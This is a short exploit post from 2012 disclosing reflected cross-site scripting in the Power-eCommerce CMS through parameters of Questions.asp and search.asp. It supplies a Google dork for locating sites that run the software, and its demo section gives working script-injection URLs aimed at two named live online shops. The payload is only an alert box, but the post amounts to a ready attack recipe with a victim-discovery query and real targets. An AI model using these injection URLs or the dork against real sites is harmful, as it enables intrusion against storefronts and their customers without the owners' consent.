############# # Exploit Title: Power-eCommerce CMS Cross Site Scripting Vulnerability # # Google Dork:intext:"Site Powered by: Power-eCommerce.com" # # Date: 08/24/2012 # # Author: Crim3R # # Vendor Home : http://www.power-ecommerce.com/ # # Tested on: all # ############# ======================================== id parametr in Questions.asp and 7 in search.asp are Vulnerable to xss D3M0 : http://store.harptennis.com//Questions.asp?id="><script>alert(0);</script> http://store.harptennis.com/search.asp?7="><script>alert(0);</script>&Search=Search http://www.cheaphpprinters.com/search.asp?7="><script>alert(0);</script>&Search=Search ===============Crim3R@Att.Net=========== $home = %00 thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir